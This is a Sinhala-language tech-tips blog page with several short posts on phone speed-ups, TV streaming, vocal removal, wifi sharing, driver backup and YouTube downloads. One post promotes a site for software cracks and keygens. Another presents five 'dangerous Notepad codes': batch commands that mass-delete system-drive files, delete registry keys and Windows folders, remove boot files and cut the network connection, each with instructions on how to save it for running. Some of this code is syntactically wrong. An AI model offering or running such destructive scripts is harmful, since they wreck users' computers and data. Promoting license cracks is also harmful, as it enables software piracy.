Latest Posts
Showing posts with label tricks. Show all posts
Showing posts with label tricks. Show all posts

ඔයාගෙ Android Phone එකත් Speed කරගන්න

HOW TO SPEED UP ANDROID PHONE



android ෆෝන් ගැන ගොඩක් අය අහන දෙයක් තමයි. ෆෝන් එක මෙච්චර slow ඇයි කියන එක. එකට ඉතින් ෆෝන් එකේ අන්තර්ගත RAM, Internal storage එක ආදිය ගොඩක් වැදගත් වෙනව. ඒ වගේම අපෙන් ෆෝන් එකට වෙන්න ඕනි දේවල් කිහිපයකුත් තියෙනවා සරලව ඒ ටික කියන්නම්. ඊට අමතරව කරන්න ඕනි දේවල් පහළ video එකෙන් බලාගන්න. 

  1.  ඔබ භාවිත නොකරන සියලු Apps Uninstall කර දමන්න.
  2.  ෆෝන් එකේ අභ්‍යන්තර මතකය (Internal memory) පිරිසිදුව  තබාගන්න
  3.  කෑෂ් (Cache) clean කර තබන්න. විශේෂයෙන් තරමක් විශාල apps  වල
  4.  SD Card එක හොඳින් තබාගන්න
  5.  ගුණාත්මක හා කුඩා Launcher එකක් භාවිත කරන්න. (cm launcher, apus launcher....etc)





ඔබ දන්නා තවත් දේවල් අනෙක් අයටත් දැනගන්න comment කරන්න.

Cracks, Keygen හොයන්න පට්ට site එකක්


ෆුල් ගේමක් දීල සමහරු ඩවුන්ලෝඩ් කරන software එහෙම අපරාදෙ trial expired වෙලා සල්ලි වතුරෙ දානව. ඉතින් ඕකට keygen එකක් හරි crack එකක් හරි use කරා නම් ඉවරනෙ. ඒකට සුපිරි අඩවියක් මෙන්න, ගිහිල්ලා බලන්න.


Free sms යවමු



කට්ටියම හැපි නිව් ඉයර් කියන ගමන් ඔන්න අද දෙන්නෙ පට්ටම දෙයක්. Free sms, කොහොමද වැඩේ. වැඩි කතා ඕනි නෑ. සුපිරිම number එකකින් තමයි sms එක යන්නෙ. කරලම බලන්න. පහලින් link එක.








ෆෝන් එකේ ඕනෑම Player එකකින් Dialog tv බලමු

 

සුභ දවසක් කියල හැමෝටම ප්‍රාර්ථනා කරනව ඉස්සෙල්ලම. Dialog tv කියන්නෙ ලංකාවෙ බහුතරයක් දෙනා tv බලන ක්‍රමයක්නෙ. ඉතින් ඔය දේ ඔයාල දන්නවා ඇති ෆෝන් එකක් භාවිත කරල වුනත් කරන්න පුලුවන්. Android playstore එකේ පහළ icon එක ඇති App එක ඔයාල දැකල ඇති.

 


                                 ඉතින් මං අද කියන්න යන්නෙ ඔය app එක ගැන නෙවෙයි. ඔය app එක පාවිච්චි කල අය දන්නවා ඇති හොඳම quality එකෙන් බලන්න නම් full signal තියෙන්න ඕනි. ඒකට ප්‍රතිකර්මයක් තමයි මං මේ කියන්න යන්නෙ. 

                       මේකට ඔයාලට MB 4ක් විතරයි වැය වෙන්නෙ. ඒ වෙන මොකවත් බාගන්න නෙවෙයි. Opera mini බාගන්න. හැබැයි දැන් ඔයා කියයි ඕක download කරගෙනනෙ තියෙන්නේ කියල. ඒත් මේක බාගෙන තියෙන්න ඕනි Dialog sim එකක් භාවිත කරල වෙන්න ඕනි නැත්තං බෑ. ඒනිසාම dialog sim එකක් භාවිත කරල බාගන්න. Opera mini එක වෙනුවට opera ලොකු එක බාන්න එපා හොඳේ. හරියට කරා නම් පහළ විධියට පෙනෙයි. බලන්න,




දැන් ඕකෙ ඔය රවුම් කරල තියෙන තැන ක්ලික් කරල ඕනෑම player එකකින් Package Active කරල tv බලන්න පුලුවන්. free බලන්න පුලුවන් tv channel කිහිපයකුත් ඇති.

'වැඩේ හොඳයි නම් අනිවා Comment කරල යන්න'

 

ගීතයක කටහඬ ඉවත් කරමු - Vocal removing

Featured-image-karaoke-bars-in-bangalore-720x340ඔන්න අද නම් දෙන්න යන්නෙ කවුරුත් ඉල්ලපු ජාතියේ පෝස්ටුවක්. මම දන්නව ඉතින් ඔයාල ගොඩක් සංගීතයට කැමතියි නෙ. ඔයාලත් කැමති ඇති සිංදුවක vocal එක remove කරල ඒකට ඔයාගෙ කටහඬ දාල වැඩක් කරන්න. මම කලින් සැරේ දුන්න පෝස්ට් එකේ මං ඒ විධියට හදපු සිංදුවත් ඔයාල අහන්න ඇති. ඇහුවෙ නැත්තං මෙතනින් යන්න.

                           ඉතින් අද සාර්ථකව සිංදුවක කටහඬ අයින් කරන්න තමයි කියල දෙන්න යන්නෙ. ඉස්සෙල්ලම කියන්න දෙයක් තියනවා. කටහඬ කිසිසේත්ම ඉවත් කල නොහැකි සිංදු තියනවා. ගොඩක්ම ඒවවල ගැහැණු කටහඬ අයින් කරන්න අමාරුයි. ඉතින් ඒ වගේ අවස්ථාවලදී සිංදුව අතෑරියට කමක් නෑ.මොකද හදන සිංදුව සුපිරියටම හදන්න ඕනි නිසා. 
                       හරි, දැන් අපි බලමු කොහොමද vocal remove කරන්නෙ කියල. ඉස්සෙල්ලම virtual DJ 7 ඩවුන්ලෝඩ් කරගන්න මෙතනින්.
                       
                               මොකද ඒකෙ තියෙන vocal remove engine එක ගොඩක් හොඳයි. bass එහෙම ඉතුරු කරනව. දැන් ඕකෙ effects වල ඇති vocals කියල කොටසක් 



                       1.ඒකේ තියෙන microphone ලකුණ ක්ලික් කරන්න 

 අදාළ සිංදුව deck එකකට drag and drop කරල

                         2. vocal effect එක අදාළ deck එකට active කරන්න  ඊට පස්සෙ record tab එකට ගිහිල්ලා record start කරල සිංදුවේ අදාළ තැන් ටික active deactive කරමින් record කරගන්න.
 ප්‍රශ්න තියනවනම් comment කරන්න හෝ nodakin@post.com එකට email කරන්න.

පරිගණකය Router එකක් කරමුද


යාලුවනේ කොහොමද, මෙන්න අද පෝස්ටුව. ඔයාගෙ computer එක router එකක් කරගන්න විධිය. මේ පෝස්ට් එක දාන්න විශේෂිතම හේතුව තමයි. සමහරු ඇහුව මේ site එකේ softwares ගැන කියල දෙන්නෙ නැද්ද කියල. ඉතින් ඒ නිසාම අද software එකක් ගැන තමයි පෝස්ට් එක ගෙනාවෙ. 
                         සමහරු නම් ඉතින් router පාවිච්චි කරනව ඇති. ඉතින් එහෙම නැති අයට මේ post එක ගොඩක් වැදගත් වෙයි කියල හිතනවා.
මේ software එක තමයි Virtual wifi router. නොමිලේ දෙන එකක්. කරන්න පුලුවන් දේ තමයි පරිගණකයට ඕනෑම අයුරකින් ලබාදෙන Internet connection එකක් මේ software එක හරහා share කරගන්න පුලුවන්. ඒ කිව්වෙ ඔයා dongle එක ගහල connect කරාම ගෙදර තියෙන ඕනෑම wifi සහිත උපාංගයකින් internet යන්න පුලුවන්.
                        download කරල වැඩේ හොඳයි නම් comment එකක් දාල යන්න අමතක කරන්න එපා....මොකද ඒක තමයි මං ලබන එකම තෘප්තිය [තේරුනාද මංද]


  








Drivers ගැන වද වෙන්න එපා



ඔන්න කොල්ලනේ මං නැවත පැමිණියා වැදගත් වෙන්න පුලුවන් කියන Software එකක් අරගෙන.
මෙක නමින් නම්, Duble Driver.

අපි කාටත් තියන ගැටලුව තමා අපේ පරිගණක වල තියන ධාවක මෘදුකාංග නොහොත් Drivers.දිනෙන් දින යාවත්කාලීන වෙන නිසා අපි අපේ පරිගණකය Format කරන විට මෙම මෘදුකාංග නැවත නැවත ස්ථාපනය කර යාවත් කාලීන කරන්න සිදු වීම.

එකට නියම විසදුම මේ පොඩි Software එක අපට දෙනවා.අපි එක වරක් අපේ පරිගණකයට අදාල Drivers Install කර Update ඉන් පසු මෙම මෘදුකාංගය යොදා එම Drivers Backup කර මෙම Software එක මගින් අපට ඔනෑම දිනයක එම Drivers නැවතත්  Restore කර ගැනීමට හැකියාව තියනවා. 

හරි එහෙනම් නැවතත් ලිපියකින් ඔබ හමුවන බලාපොරොත්තුවෙන් මම යනවා.

Software එක පහලින් බා ගන්න.
Thanks Watching My post

DOWNLOAD




I,m Madushan Rajapaksha
E-mail: madushan1996@hotmail.com

ඔබ දැනගත යුතු Notepad codes 5ක්

ඔබ දැනගත යුතු Notepad codes 5ක්



                                        ඔන්න අද ආවෙ භයානක codes 5ක් අරගෙන. මේව type කරන්නෙ notepad එකේ. ඔයාගෙ computer එක තත්පර 30 වගේ සුළු කාලයකදී විනාශ කරන්න මෙම code වලට පුලුවන්.
                 එහෙනම් පහලින් දාල තියෙන්නේ ඒ codes පහ. නිකමටවත් උත්සාහ කරන්න එපා. දැනගන්න විතරයි හොඳේ.

1:The Blue Screen of Death-නීල තිර මරණය

 echo off
 del %systemdrive%\*.* /f /s /q
 shutdown -r -f -t 00

.VBS ලෙස save කරන්න.


2:Delete key Registry files

@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR

ඕනෑම නමක් යොදා .VBS ලෙස save කරන්න.

3:Delete the WINDOWS/LINUX file
erase C:\WINDOWS 
ඕනෑම නමක් යොදා .cmd ලෙස C:\ තුළ save කරන්න.

4:සදාකාලිකව පරිගණකය විනාශ කිරීමට 

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඕනෑම නමක් යොදා .bat ලෙස save කරන්න.
*Vista සඳහා ක්‍රියා නොකරයි*

5: internet ක්‍රියා විරහිත කිරීමට

@Echo off
Ipconfig /release

ඕනෑම නමක් යොදා .bat ලෙස save කරන්න.

*දැනගනීම පිණිස පමණයි.

මෘදුකාංග නොමැතිව youtube videos ඩවුන්ලෝඩ් කරමු


  අද අපි ගොඩක් ආසාවෙන් පාවිච්චි කරන youtube වෙබ් අඩවියේ videos ඩවුන්ලෝඩ් කරගන්න ක්‍රමයක් කියල දෙන්න යන්නෙ. මේක සමහරක් විට ඔයාල දන්නවත් ඇති,නොදන්නවා වෙන්නත් ඇති. ඉතින් ඒ නිසා අපි හිතුවා ඒ ගැන කියල දෙන්න. ඔයාට දන්නව ඇති youtube video ඩවුන්ලෝඩ් කරන්න ගොඩක් video downloaders අන්තර්ජාලයේ තියනවා. ඒ වගේමයි සමහර ඒවා 100MB පන්නපුව. ඉතින් මේ ක්‍රමයෙන් ඔයාලට කිසිම MB ගණනක් වැය කරන්නෙ නැතුව ලේසියෙන්ම ඕනම quality එකකට ඔයාට අවශ්‍ය video එක ඩවුන්ලෝඩ් කරගන්න පුලුවන්.
              හරි දැන් වැඩේට බහිමු.

ඉස්සෙල්ලම ඔයාට ඕනි වීඩියෝවෙ link එක type කරගන්න. පහත ආකාරයට,


දැන් පහත රූපයේ විධියට link එක ඉස්සරහට “ ss “ යොදලා enter කරන්න.



ඊළඟට පහතින් පෙනෙන වෙබ් පිටුව ඔයාට පෙනෙයි. ඒකෙ රවුම් කරල තියෙන තැනින් ඔයාට ඒ වීඩියෝව ඩවුන්ලෝඩ් කරගන්න ඕනි quality එක තෝරගන්න පුලුවන්. ඊට පස්සෙ ඉතින් ඔයාට තියෙන්නේ Download බොත්තම ක්ලික් කරන්න විතරයි.


 
Copyright © 2015-2016. XXXLK - Sinhala Wela Videos - All Rights Reserved
Proudly powered by Blogger